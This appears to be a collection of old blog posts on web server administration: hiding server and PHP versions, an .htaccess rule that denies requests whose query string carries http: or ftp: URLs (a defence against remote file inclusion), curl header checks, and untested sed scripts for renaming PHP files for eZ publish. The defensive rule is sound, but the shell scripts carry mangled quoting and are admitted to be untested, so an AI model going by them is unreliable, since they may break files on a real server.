Version Hiding for Server and Application Security

One of the easiest ways to make a server or application more secure it to reduce the publicly accessible information.

The above link describes how the versions can be suppressed in the HTTP headers to make it more difficult for people to identify the version of server software you are running, and the version of PHP.

This same principle should be used with applications. Any tag in the HTML that exposes the version should be suppressed.

md5('just_a_test')

With sincere thanks to the associated URL, this is .htaccess code that can be used with b2evolution to deny access to requestors who include http: or ftp: on the query string. This is slightly different than the other post - it seems to be working. [L,F] didn’t work as I would have liked.

.htaccess

Code

RewriteEngine On
RewriteCond %{QUERY_STRING} ^.*=(ht|f)tp\://.*$ [NC]
RewriteRule ^.*$  403.php [L]
 
 
# CATCH EVERYTHING INTO B2EVO:
# The following will allow you to have URL right off the site root,
# using index.php as a stub but not showing it.
# This will add support for URLs like:  http://example.com/2006/08/29/post-title
# Redirect anything that's not an existing directory or file to index.php
#
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^.*$ index.php [L]

403.php

Code

header('HTTP/1.1 403 Forbidden');

I hope this is helpful.

Rapid Development Strategies

These are my rapid development strategies.

Front2Back

Works well for simple sites where the page layout is very important.

  1. Build the HTML/CSS framework of the screen
  2. Create navigation and page stubs
  3. Set up help, about, terms/privacy stubs
  4. Create a login screen (if necessary), that does nothing, and a logout. This helps to establish the logic flow.
  5. Build a home page
  6. Build pages out in a logical order (it will vary), again, front2back - start with the way it looks on the screen, then build the server side logic.

Back2Front

Works well when the complexity and risk are related to server-side logic and interfaces, or when there is a designer and developer on the project.

  1. Get the documentation, find the resources for the difficult parts
  2. Choose the simplest task, for example, submitting access credentials, and get it working.
  3. Define an object-oriented architecture and one class to support the requirements.
  4. Get the OO code interface working
  5. Break the OO code into two layers (if necessary), one a general interface, the other specific to the class.
  6. Clone the OO code for the remaining data types
  7. Create the view for one class, then use the same approach as before to define the display architecture. Strive to use only very basic HTML, so the design can be managed efficiently with CSS.
  8. Refine the interfaces to make integration easy.

curl

This is the second half of the prior post - how to find out what version of PHP are running on your server. Use curl with the -I (uppercase i) option, followed by the domain name to get the HTTP headers. There are many options you can use with curl, and the server can be configured to suppress some of this information for improved security - so if you don’t get the results you need, refer to the man pages and try again.

HTTP/1.1 200 OK
Date: Fri, 21 Mar 2008 23:11:07 GMT
Server: Apache/1.3.41 (Unix) mod_jk/1.2.23 mod_deflate/1.0.21 mod_fastcgi/2.4.2 PHP/5.2.3 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.8 FrontPage/5.0.2.2634a mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/4.4.8
Content-Type: text/html

Another approach is to create one file, ver.php, and link to it called ver.php5. It should contain the following:

echo phpversion();

Request both URLs through a browser to see what version is used to deliver them.

Run eZ publish 4.0 on a server with PHP4 as the default and PHP5 available

My server has PHP4 as the default, and PHP5 available, indicated by the extension .php5. To use eZ publish 4.0, you need PHP5. To use it, one approach is to get a list of the PHP files, like so:

tar tzf eztagcloud.tgz > php_file_list

Use grep and sed to create a script to rename the files, as follows:

grep “\.php” php_file_list | sed “s/\(\(.*\)\.php\)/mv \1 \2.php5/” > php5

Make php5 executable:

chmod 700 php5

Untar the tar file:

tar xzf eztagcloud.tgz

Run php5:

./php5

Check by using:

ls -R eztagcloud/* | grep “php”

Change the filename.extension in the rewrite rules on the target from index.php to index.php5.

The include and require directives in the files must also be updated with the new extension. The file list extracted from the tar file could be used to feed a series of sed commands that substitute .php5 for .php.

grep “\.php” php_file_list | sed “s/\(\(.*\)\.php\)/sed –in-place \"s\/\\\.php\/\\\.php5\/\” \15/” > php52

Make php52 executeable.

If you don’t have alot of experience with eZ publish, and LAMP - this entire post should be considered extremely risky. However, it will not take long to check the success or failure of this idea - so it is definitely worth a try. Apologies for not testing it fully.

This approach should work for any application, and you may want to reverse it - so PHP5 is the default language, and PHP4 is accessible by extension. Good luck.

This link has some great suggestions about how to use htaccess to route all .php requests through php5. Set at the directory or account level, it may eliminate the renaming requiremnets. I couldn’t do it on my server, but others may be able to use it. Thanks to the author.
http://corz.org/serv/tricks/htaccess.php

.htaccess file

php5_value date.timezone 'America/Chicago'
php_value allow_call_time_pass_reference 0
php5_value magic_quotes_gpc 0


FilesMatch "."
order allow,deny
deny from all
/FilesMatch

FilesMatch "(index\.php5|\.(gif|jpe?g|png|css|js|html)|var(.+)storage.pdf(.+)\.pdf)$"
order allow,deny
allow from all
/FilesMatch


RewriteEngine On
RewriteRule content/treemenu/?$ index_treemenu.php5
RewriteRule index_treemenu.php5 - [L]

RewriteRule !\.(gif|jpe?g|png|css|js|html)|var(.+)storage.pdf(.+)\.pdf$ index.php5

DirectoryIndex index.php5

Run the installer - use .php5. Before you start fine tuning, be sure to change the extensions in settings/dbschema.ini and settings/codetemplates.ini.

Be sure to adhere to the requirements for eZ4, including eZ components, which can be processed with this approach as well.

*** This configuration is only intended for testing, production sites should be supported appropriately ***